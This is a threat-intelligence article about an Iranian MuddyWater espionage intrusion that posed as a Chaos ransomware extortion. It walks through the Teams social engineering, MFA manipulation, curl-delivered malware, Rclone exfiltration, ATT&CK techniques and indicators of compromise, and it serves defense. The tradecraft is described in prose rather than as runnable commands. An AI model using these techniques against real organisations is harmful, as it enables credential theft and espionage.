May 6, 2026nation state

How a nation-state spy operation hid inside a ransomware extortion demand

The ransomware demand was fake. No files were ever encrypted. The extortion emails, the data leak portal listing, the negotiation process: all of it was theater, staged by Iranian government hackers to make their espionage operation look like an ordinary criminal shakedown. While the victim's security team focused on the ransom, the attackers were quietly collecting intelligence and maintaining persistent access to the network.

The operation, attributed with moderate confidence to MuddyWater, a group officially assessed by the FBI, CISA, and NSA as a unit of Iran's Ministry of Intelligence and Security (MOIS), began with a Microsoft Teams chat. An employee received an external message from someone posing as a support contact. That conversation escalated to a screen-sharing session. During the session, the attacker asked the employee to type their password into a text file. The employee complied. From that moment, the attackers had everything they needed.

What makes this operation alarming beyond its technical complexity is the strategic insight behind it: the ransomware incident response playbook, the one that trains defenders to treat extortion as the primary threat, was itself the weapon. By triggering a financial-crime response, the attackers bought time for the intelligence collection that was always the real objective. The ransom demand did not just hide the espionage. It redirected the entire defensive response away from it.

🟡 Level 2

Read the narrative

How the attack unfolded, phase by phase.

6 min read

🔴 Level 3

Go deeper

Technical mechanism, CVE, ATT&CK mapping, primary sources.

3 min read

Does this apply to you?

If your organization allows external Microsoft Teams messages from outside your tenant without restrictions, you have a direct social engineering exposure identical to the one exploited here. If your employees can grant screen-sharing access to external parties without IT approval, your blast radius extends to credential theft, MFA manipulation, and persistent attacker access before any malware is deployed. This pattern applies beyond Teams: any collaboration platform where external parties can initiate direct contact and request screen access creates the same exposure. If your organization would route a ransomware extortion demand to a financial-crime response team rather than immediately treating it as a potential espionage cover, your triage process has the same blind spot this operation exploited. Check whether your Teams tenant blocks or flags external chat initiation from unknown domains. If it does not, an attacker can reach any employee directly. You may have been affected if your organization received unsolicited external Teams messages from unknown contacts in early 2026.

Narrative · 6 min read

The Context

MuddyWater is a hacking group operated by Iran's Ministry of Intelligence and Security. Western intelligence agencies, including the FBI, CISA, NSA, and the UK's NCSC, have formally attributed the group to MOIS and documented its focus on espionage against government, defense, and critical infrastructure targets in the United States, Israel, and allied nations.

The operation described here was active in early 2026, overlapping with a period of significant geopolitical tension. U.S. and Israeli military strikes on Iran began on February 28, 2026, under the name Operation Epic Fury. MuddyWater's intrusions into U.S. and Canadian networks had already begun weeks before those strikes, raising concerns that the group had pre-positioned access that could be used for disruptive attacks beyond intelligence collection.

Key terms

MuddyWater: A hacking group operated by Iran's Ministry of Intelligence and Security, also tracked under the names Seedworm, Mango Sandstorm, and MERCURY, among others.
RaaS (Ransomware as a Service): A criminal business model where ransomware developers license their tools and infrastructure to other attackers in exchange for a cut of ransom payments. Chaos is one such operation.
False flag: A deception tactic where an attacker deliberately makes their operation appear to originate from a different group or country, in this case mimicking criminal ransomware activity to hide state-sponsored espionage.
RAT (Remote Access Trojan): Malware that gives an attacker remote control over a compromised computer, including the ability to run commands, move files, and maintain persistent access.
MFA (Multi-Factor Authentication): A security control requiring users to verify their identity through a second method beyond a password, such as a code sent to a phone. Attackers in this operation manipulated MFA settings after stealing credentials to lock in their access.

The Attack, Phase by Phase

Phase 1: Teams-Based Social Engineering and Credential Harvest

The attack began not with malware but with a chat message. Attackers sent external Microsoft Teams requests to employees, posing as support personnel or trusted contacts. Once a conversation was established, they escalated to screen-sharing sessions.

During those sessions, attackers ran discovery commands, accessed VPN configuration files, and instructed employees to type their passwords directly into text files on screen. They also used phishing pages disguised as Microsoft Quick Assist download pages to capture credentials through a separate channel.

With credentials in hand, attackers manipulated victims' MFA settings, ensuring their access would survive a password reset. In at least one case, they also installed AnyDesk to create a backup channel into the network.

Phase 2: Malware Deployment and Persistent Access

With authenticated access, the attackers used Remote Desktop Protocol (RDP) to download a file called ms_upd.exe from an external server using curl, making the activity blend with routine network traffic.

ms_upd.exe is a dropper tracked as Stagecomp. It collected basic system information, contacted a command-and-control server at moonzonet.com, and delivered a custom RAT called Darkcomp, packaged as game.exe. Darkcomp disguised itself as a legitimate Microsoft application and gave attackers persistent shell access.

The attackers also used pythonw.exe to inject code into suspended processes, hiding malicious activity inside legitimate system processes. Remote management tools DWAgent and AnyDesk were installed alongside the malware chain to ensure access even if the malware was later removed.

Phase 3: Data Exfiltration and Espionage

With persistent access established, the attackers conducted reconnaissance and data theft consistent with intelligence collection. They attempted to exfiltrate data from a U.S. defense and aerospace software company with Israeli operations, using Rclone to copy files to a Wasabi Technologies cloud storage bucket. Whether that transfer succeeded was not confirmed.

Across a broader set of victims—including a U.S. bank, a U.S. airport, and nonprofits in both the U.S. and Canada—the attackers deployed two additional backdoors: Fakeset, a Python-based tool, and Dindoor, which uses the Deno JavaScript runtime. Both were signed with certificates previously linked to MuddyWater.

Phase 4: Ransomware False Flag and Extortion Decoy

No files were ever encrypted. Instead, the attackers sent extortion emails under the branding of Chaos, a real ransomware-as-a-service operation, listed the victim on the Chaos data leak portal, and threatened to publish stolen data unless a ransom was paid.

The victim's security team, facing what appeared to be a ransomware incident, focused its response on the financial threat—consuming time and attention that would otherwise have gone toward hunting the persistent access already installed.

When negotiations stalled and investigators could not locate an actual ransomware payload, the attackers released the stolen data publicly. That release confirmed what Rapid7 had assessed: the ransomware scenario was a deliberate decoy. The extortion was not the goal. It was the cover story.

What Made This Possible

Microsoft Teams allows external contact by default. In many enterprise configurations, anyone outside an organization can initiate a Teams chat with any employee. The attackers did not need to compromise any system to reach their targets.
The ransomware playbook has a blind spot. Incident response procedures for ransomware are designed around a financial-crime model: contain the encryption, negotiate or refuse the ransom, restore from backups. That playbook does not account for a scenario where the ransom demand is itself the misdirection.
Criminal and state-sponsored tooling now share infrastructure. MuddyWater's malware was signed with certificates also used by a commercial malware-as-a-service tool called CastleLoader. When nation-state actors operate through criminal ecosystems, the categorical separation between cybercrime and espionage that defenders use to triage incidents collapses, producing systematic misattribution and delayed response.

What Should Have Stopped This

No single defense would have neutralized this operation. Every control that would have reduced the blast radius shares one trait: it does not depend on correctly identifying the attacker's true motive before acting.

Restrict external Teams access. Blocking or requiring approval for external chat from unknown domains removes the initial attack vector entirely. This is a configuration change, not a detection problem.
Enforce phishing-resistant MFA. Hardware keys or device-bound credentials cannot be redirected to an attacker's session, preventing access lock-in after credential theft.
Treat remote management tool installations as high-priority alerts. Any installation of AnyDesk, DWAgent, or similar tools outside an approved list should trigger immediate review.
Separate ransomware response from persistence hunting. The moment a ransomware claim appears without a confirmed encryption event, the investigation should expand to treat the extortion as a potential decoy.

The Takeaway

This operation is the same class of failure as the Stryker Intune wipe: a trusted administrative tool was weaponized against the organization it was built to serve. The difference here is that the attackers added a second layer of misdirection. They did not just weaponize the tools. They weaponized the incident response process itself.

The systemic lesson is not that ransomware is sometimes fake. It is that any categorical label defenders use to triage an incident—ransomware, cybercrime, financial threat—can be deliberately triggered by an attacker who wants defenders thinking about the wrong category. The Chaos branding was not chosen because it was convincing. It was chosen because it was familiar enough to activate a specific, well-rehearsed response.

Pattern to remember: A ransomware demand with no encryption event is not a failed attack. It may be a successful misdirection.

What changed: Incident response categories—the labels defenders use to decide who responds and how—are now attack surfaces that adversaries can deliberately trigger to redirect defensive attention away from their actual objectives.

Technical Deep Dive · 3 min

The Technical Mechanism

The intrusion chain began with Microsoft Teams external chat requests, exploiting default tenant configurations that permit unsolicited external contact. Attackers escalated to screen-sharing sessions to conduct live credential harvesting, instructing victims to input credentials into locally created text files and using phishing pages mimicking Microsoft Quick Assist to capture credentials through a parallel channel. Post-credential-capture, attackers modified Azure Active Directory MFA settings on compromised accounts to ensure persistent authenticated access.

The malware deployment chain proceeded as follows:

ms_upd.exe (Stagecomp): a dropper downloaded via curl from 172.86.126.208 over RDP. Stagecomp collects system telemetry, contacts moonzonet.com for C2 tasking, and drops the next-stage payload.
game.exe (Darkcomp): a bespoke RAT that masquerades as a Microsoft WebView2 application by sideloading WebView2Loader.dll. Supports command execution, file manipulation, and persistent shell execution. Signed with a code-signing certificate attributed to "Donald Gay," previously used to sign MuddyWater tooling including Fakeset and CastleLoader variants.
visualwincomp.txt: a configuration or payload file dropped alongside Darkcomp, exact function not publicly disclosed.
pythonw.exe was used to inject code into suspended processes, a process-hollowing variant used to hide malicious execution within legitimate system processes.

The Dindoor backdoor, deployed on the U.S. bank, Canadian nonprofit, and Israeli software company networks, uses the Deno JavaScript/TypeScript runtime for execution. This is a deliberate evasion choice: Deno is less commonly monitored than Node.js and allows execution of arbitrary JavaScript without a traditional compiled binary. Dindoor is signed with a certificate issued to "Amy Cherne."

Fakeset is a Python-based backdoor found on U.S. airport and nonprofit networks, signed with certificates issued to both "Amy Cherne" and "Donald Gay," and downloaded from Backblaze cloud storage servers, another evasion technique using trusted cloud infrastructure for payload delivery.

The false-flag layer involved no technical ransomware deployment. The Chaos RaaS brand was used exclusively through extortion emails and data leak portal listings. No encryption binary, ransomware configuration, or decryption key infrastructure was identified on victim systems.

CVE and Advisories

No CVE identifier applies to this intrusion. The attack did not exploit a software vulnerability. It exploited default Microsoft Teams tenant configuration (permitting external chat initiation), human compliance during social engineering, and standard operating system utilities (curl, pythonw.exe, RDP) for malware delivery.

Relevant prior advisories on MuddyWater tradecraft:

CISA Advisory AA22-055A: Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks (February 2022, joint FBI/CISA/NSA/NCSC advisory formally attributing MuddyWater to MOIS)

MITRE ATT&CK Mapping

Technique ID	ATT&CK name	How it appeared
T1566.004	Phishing: Spearphishing via Service	Attackers used Microsoft Teams external chat to initiate contact with victims, bypassing email-based phishing defenses.
T1204.001	User Execution: Malicious Link	Victims were directed to phishing pages mimicking Microsoft Quick Assist to capture credentials.
T1078	Valid Accounts	Stolen credentials used to authenticate to victim systems, blending attacker activity with legitimate user behavior.
T1556	Modify Authentication Process	MFA settings on compromised accounts were manipulated to ensure persistent authenticated access.
T1105	Ingress Tool Transfer	Stagecomp dropper downloaded via curl from external server 172.86.126.208 over an RDP session.
T1055	Process Injection	pythonw.exe used to inject code into suspended processes to hide malicious execution.
T1219	Remote Access Software	AnyDesk and DWAgent installed to maintain persistent remote access independent of the malware chain.
T1567	Exfiltration Over Web Service	Rclone used to attempt data exfiltration to a Wasabi Technologies cloud storage bucket.
T1036	Masquerading	Darkcomp RAT disguised as a Microsoft WebView2 application via DLL sideloading. Chaos RaaS branding used to masquerade as financially motivated criminal activity.
T1588.003	Obtain Capabilities: Code Signing Certificates	Malware signed with certificates attributed to Donald Gay and Amy Cherne, previously linked to MuddyWater tooling, to appear legitimate and complicate attribution.

Indicators of Compromise

Network Indicators

C2 domain: moonzonet.com
Dropper download server: 172.86.126.208
Exfiltration target: Wasabi Technologies cloud storage (bucket details not publicly disclosed)
Payload delivery: Backblaze cloud storage servers (Fakeset)

File Indicators

ms_upd.exe (Stagecomp dropper)
game.exe (Darkcomp RAT)
WebView2Loader.dll (sideloaded by Darkcomp)
visualwincomp.txt (Darkcomp configuration/payload)

Certificate Indicators

Code-signing certificate: "Donald Gay" (signs Stagecomp, Darkcomp, Fakeset, CastleLoader variants)
Code-signing certificate: "Amy Cherne" (signs Dindoor, Fakeset)

Detection Notes

Detection is significantly complicated by the attacker's use of legitimate tools throughout the chain: Teams for initial access, RDP and curl for delivery, pythonw.exe for injection, AnyDesk and DWAgent for persistence. Microsoft and Kaspersky have published signatures: Trojan:Python/MuddyWater.DB!MTB (Microsoft) and Backdoor.Python.MuddyWater.a (Kaspersky). The absence of a ransomware encryption event in a purported ransomware incident is itself a detection signal.

Attribution

Rapid7 attributes this intrusion to MuddyWater (also tracked as Seedworm, Static Kitten, Mango Sandstorm, MERCURY, TEMP.Zagros, TA450) with moderate confidence, based on four infrastructure and tradecraft indicators: (1) the "Donald Gay" code-signing certificate, previously linked to MuddyWater by Google, Microsoft, and Kaspersky; (2) the moonzonet.com C2 domain, previously associated with MuddyWater operations; (3) use of pythonw.exe for process injection, a documented MuddyWater technique; and (4) interactive Microsoft Teams sessions for credential and MFA harvesting, consistent with documented MuddyWater tradecraft.

The broader February 2026 campaign was independently attributed to Seedworm/MuddyWater by Broadcom Symantec and Carbon Black based on overlapping certificate infrastructure. MuddyWater is formally assessed by the FBI, CISA, NSA, and UK NCSC as a subordinate element of MOIS.

Check Point Research documented MuddyWater's prior use of Qilin ransomware in an October 2025 attack on Israel's Shamir Medical Center. Israel's National Cyber Directorate initially attributed that attack to Eastern European criminals before correcting the record and blaming Iran. Rapid7 assesses the switch from Qilin to Chaos branding was a deliberate effort to reduce attribution risk following the public exposure of the Qilin-linked operation.

Primary Sources

01.
Iran-Linked APT Posed as Chaos Ransomware Member in Espionage Campaign
Rapid7 / Infosecurity Magazine · May 06, 2026
02.
MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack
The Hacker News · May 06, 2026
03.
MuddyWater hackers use Chaos ransomware as a decoy in attacks
BleepingComputer · May 06, 2026
04.
Iranian cyber espionage disguised as a Chaos Ransomware attack
Security Affairs · May 06, 2026
05.
Iranian APT Intrusion Masquerades as Chaos Ransomware Attack
SecurityWeek · May 06, 2026
06.
Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company
Broadcom Symantec / security.com · March 05, 2026
07.
Iranian MOIS Actors and the Cyber Crime Connection
Check Point Research · March 10, 2026